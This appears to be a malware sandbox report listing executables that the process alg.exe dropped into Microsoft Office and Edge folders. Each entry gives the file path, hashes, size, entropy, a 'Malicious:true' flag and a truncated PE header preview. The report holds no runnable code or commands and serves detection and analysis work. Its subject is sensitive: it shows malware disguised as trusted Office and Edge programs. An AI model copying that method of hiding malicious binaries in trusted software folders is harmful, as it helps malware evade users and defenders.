                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@.d.@...A.f.@...ASf.@..z@.f.@.f.@.f.@...A.f.@Rich.f.@................PE..L......e............... .........................@................................._...................................................,T..............................8...................Hj..........@...................D...`....................text...u........................... ..`.rdata..0...........................@..@.data...............................@....c2r.................d...................rsrc...,T.......V...f..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1293824
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.215722311554944
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:jgd4aoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:0DosqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:BF86DE371C28169907E775959D315A38
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5B709433323AC78BAB8832EBB60148DEDFA2BB4C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:95E8DB7A840DCCEFD2E1E237B80FB56B8C998CF39EC4A08CAC579245D750F678
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:44222D23BE9685B7045F95A3E1A5D8AC0DC98115EAAC70A576F535FA10890929F917DA8C1673400E4C9D010F764F146F5B2745380E6A1834ABFD4D5C02F88BA6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^.U.^.U.^.U.&rU.^.U.$.T.^.U.$.T.^.U.$.T.^.U2,.T.^.U2,.T.^.U.^.U.\.U.$.T.^.U.$.T.^.U.$.T.^.U.$.U.^.U.^vU.^.U.$.T.^.URich.^.U........................PE..L......e............... ............&q............@.................................BG.......................................p..,.......`...........................(...8...............................@............................................text............................... ..`.rdata..|o.......p..................@..@.data....T.......R..................@....c2r....T....p.......L...................rsrc...`............N..............@..@.reloc...p.......`...^..............@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1147904
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0400534116109945
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:X0yXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:tsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:23D6235EC9124DDC6330E26094D0CDB6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A53F86A5320889AE70FEE086B83F01F286D2BCA6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:1553B61E2A38FD2EFB02EE6371C4D7FC373932187A01109C7576B0FCCAE20522
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:64DF42BCBA7C520F70FE41CBBC1D47A97B06D1CECD42AFB837AB11404CD87E6E21B8D4C27D41EDE851632C055702CA5423FDC0D170646986383724476F362499
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T{..T{..T{..].!.D{..4...P{..4...M{..4...X{..4...Q{.....Q{..T{..0{..1...W{..1...S{..1.M.U{..1...U{..RichT{..........................PE..L....[.d............... ."...(......x........@....@.................................mI.......................................I.......p...............................R..8............................A..@............@..T....H..`....................text...? .......".................. ..`.rdata..(....@.......&..............@..@.data...<....`.......<..............@....rsrc........p.......>..............@..@.reloc...P.......@...D..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1418752
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.397315313847152
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:OAZHHrLZF/0sqjnhMgeiCl7G0nehbGZpbD:OePZFQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:C64813200B220D1EC65D2A9109BDFDCB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D839FC7068BA1684F90B738E1F6F1140C0B9415B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:658BB84E1CF2C37A652C6DA8C8C7B089A611DC44E3680A8DA03C10427F932C0D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FB104E2CE70737241ADED8556E7E90CEA90EEB79551C5ED58D152CBEF619ACE1601B544E036F993DD898582DD7AA68078C4FD4013429139D9CDA9A9D7DC26C08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!.e...e...e.......n..............I.......w.......p.......d.......r.......n...e...........{.......d...e.F.d.......d...Riche...........................PE..L....;.d............... .....X......q........0....@.................................*^..........................................x.... ...a..............................8..............................@............0..p.......`....................text............................... ..`.rdata......0......................@..@.data....,..........................@....rsrc....a... ...b..................@..@.reloc...p.......`...F..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):53721600
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.543429007131648
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1572864:2NVpTyR96CwKImp81ujlSHFsQ4adtZp20wfP+9HgoZRZa:2Q9lw68HSq
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4CFB7F5CFE4D12C0C714F72757DFD00B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A6A06F1F483E698200E8D8A1BE847B2EC9EF3FDE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:723A3691F4FFB0CB7EA0B06AEAA1A4099BF442EFBE8247B4BBBD858174B6B33C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5B89E590D0B7A6A676EF012A05ED6943DAC050939B5A07CBA70C57C5569C87E8032442861B6AD3F8BD361F38E125988A2F0D63A14AC6527BC8242A7FBB3CE656
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......X.mj.r.9.r.9.r.9...9.r.9|..8.r.9|..8;r.9|..8.r.9|..8.r.9...8.r.9...8.r.9...8.r.9.r.9Gm.9y..8.r.9y..8.r.9y..8.o.9y..8.r.9y..9.r.9.r.9.r.9y..8.r.9Rich.r.9........PE..L......e..........".... .._.........y........@f...@.......................... 5.....;.3.................................[.......h......$DW.........................,q..8...................(.q...... `.@.............`.....d........................text...,._......._................. ..`.rdata...bM...`..dM..._.............@..@.data................\..............@....detourc.............p..............@..@.c2r.....................................rsrc...$DW.....FW.................@..@.reloc....$.. ....#.................@...........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):40811520
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.4616001794178874
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:786432:rbuMdv8TOUI/JgcnYblPv+msZPH53u5LBsk/Q4YbFuceo4h5ayMI5:ryM8TOtIlPv+msZPH1u5WkID5uceo4qY
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:BC7E186C7C6480D4C000DB3AFF8680F5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:B1487D5575703BC313A06ADD44A6DB8E4DD2B34E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E934398AD305C71C92EBDA1D88A90A55EED8788F8B7595293B8EEEBD4B74FCD9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8606B33B4F8823E4B4DF7C6AC735231F9B9E2455ED8B8EDFD179A6ECF9DD86A0335D63C2AB33E3A7D2A95271D9DC4EEE0D04B6E9EA9124284E22F9CA48256CAF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........j............sI.....q......q......q......q.....Jy.....Jy.....Jy.............q......q......q......q......q%.....M.....q.....Rich....................PE..L......e............... ............h.......`....@...........................o.....N,o.............................4...^....P..T....`...]>.............................8........................... 5..@............ ..l............................text...P........................... ..`.rdata..8.;.. ....;.................@..@.data....<.......0..................@....detourc.....0......................@..@.c2r....|....P...........................rsrc....]>..`...^>.................@..@.reloc...P....S..@...|S.............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1657344
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.635154074414659
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:VE8DMeflpnIOvYULsqjnhMgeiCl7G0nehbGZpbD:VtDD9pnIONDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3E053236D04018802910B7D4008181FC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F574DF00D0DF905BE90BD214530D6BBFB67C4B8C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A76963456657679588ACE11F6FFC68D322072CAE6EE9F83F2552B71E34BE14F6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:7F1AFB1CE4297C4A7205F95F34EF4DD6C33647E48A329E00DA4910836A943FA5D59F2E3A71726CE7AA76197B9E3A0C504DF8AEDB8A213871111733761EDA9479
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................%.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.748489255458534
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:8B1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8E6Dmg27RnWGj:2HzorVmr2ZkRpdJYolkD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:D4F90B750EE44AF9819B30FB8860C88C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:5EFA51C3746A9FFB2E9EF88F1CC0995534CF31C6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:A4C567EC3C9A2521F1BC345E6446183C7F3F003C206FF2AF3E6FD23EA6596D27
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:5647CF7BE52E812C4E58BEC43FE52913D71F566C24AA704748C83840E793C88264E8C16D501CD509FE62E7AD10620B45B4AA92FF6A519B172083F2C2A70A8EB1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.......B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1238528
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1469454255679885
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:03w1uVdSEj5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:0EyT5sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:49ECD7712856496DA8FC228368EA549B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F36C466CDBB1B09F182F3314460D73E04E9A7DBE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:AE067632E3DC5B7B2785F96C43CC644E0EF8F3D8FFC8FA90E2BC91CCF34EF5D7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:CFAAF9B36FEEA63F14C74E8F08ADF032E417FE7A156C342BA96AA271762336462D8B072793076FA4D3CC05C667B8E2E2E8ECCF4912227D4B00CA906875234812
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.049985625183445
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:/hDdVrQ95RW0YEHyWQXE/09Val0GkDmg27RnWGj:/hHYW+HyWK3D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:89409708A6724D7952817A0B0F826EB7
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:629B791969649983616EA5CCD78428026D2C809B
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:8B22FB966B8EC2E0A35A2E43D78D434817BDD57A9907D54567C7A211F9598BC6
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E498FC5E8DE93AC9E6FB12BF48327C353F146454753FD8188E5AC343510855AA8F0651A5CB249F35048A72D3FB548CBEEA2BFDA2616F282C47E5FD819275A2CB
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......+$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.158506024842003
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:m70E0ZCQZMiU6Rrt9RoctGfmddGsqjnhMgeiCl7G0nehbGZpbD:C0EzQSyRPRoc12Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:79CC2D21ACD415CE8A5FA93DA642D555
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:568E7C26DB42E020DF7B940CE4A7D0E91D30E1E9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:4DE239EFE1D2714038E558174DDE670FCA0C9E558B4BB2B2CBB0210EB2F74938
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:9173560A46476890DD89667CA79F1AF5C5CBE1C9DDA04C545AB0B524F91C77AFB71AB091A53668F02A0DBF7C9300AC2A92DABB6159F388DED007D97A2B2AD725
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.145497641215162
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:oiD2VmA1YXwHwlklb8boUuWPg2gtsqjnhMgeiCl7G0nehbGZpbD:bD2VmAyiwIb8boQaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:66441193E888EC4A6480471CF92D0B21
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:BB1625A19C3A286A2704FF9A5692C5B477B0A9CC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C1CB1DE7A086DB32FF7010E190D5490F4DCC86BF0C10B4A53876B9D504B4D281
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:46C7BA5C1E8EA1534F877A23E686A7EF5B9A4E716E2E433755D2413BD295F5AC4F42138BB5236F6D2EADA98D8BC715031498D5784CABB3C352732CE7B66B6F81
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......V..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.950767979766559
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:/fD3zO9ZhBGloizM3HRNr00SDmg27RnWGj:HDaalxzM00SD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:9280D3B9B68BB58C69125BA7263EC6DF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:172E4A674EB8EEF91D47859828C88156CCF9E21A
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:71D3B25AFA7CBEE61411A904A82FD70FD7BE21FA9EEB9B3B23C58283F3891EBE
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C9A9B7821F46B2148A083A8EC05BFCFEDD2FAE6F99F4B28950BF73F574306DE2E29B8B69F8741C6D4EE20C71AF49C95A372CE6090D96703D5CC446DA3F34C2ED
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....x.+... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.824627699486896
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:49152:jTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPh1Dmg27RnN:CI72LvkrDpbxJRoIMKD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3580978CAE9B86011149E5186DE36E65
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:FC7CC58542A3D871E12F8E8FCA5D68105D670D49
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:CF4004412947703D9D724F33326A7A07C1938AB9B8828981D47EEFC82764B6E5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:8C68BDD0C1087C07C01B0B768A4FE4F35127FFEA9203AB096D80575519CC5D9BEAC20125341E66A9B55ED88B9114A6557A6816681B1F55D7E0DCA2C5E096250F
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
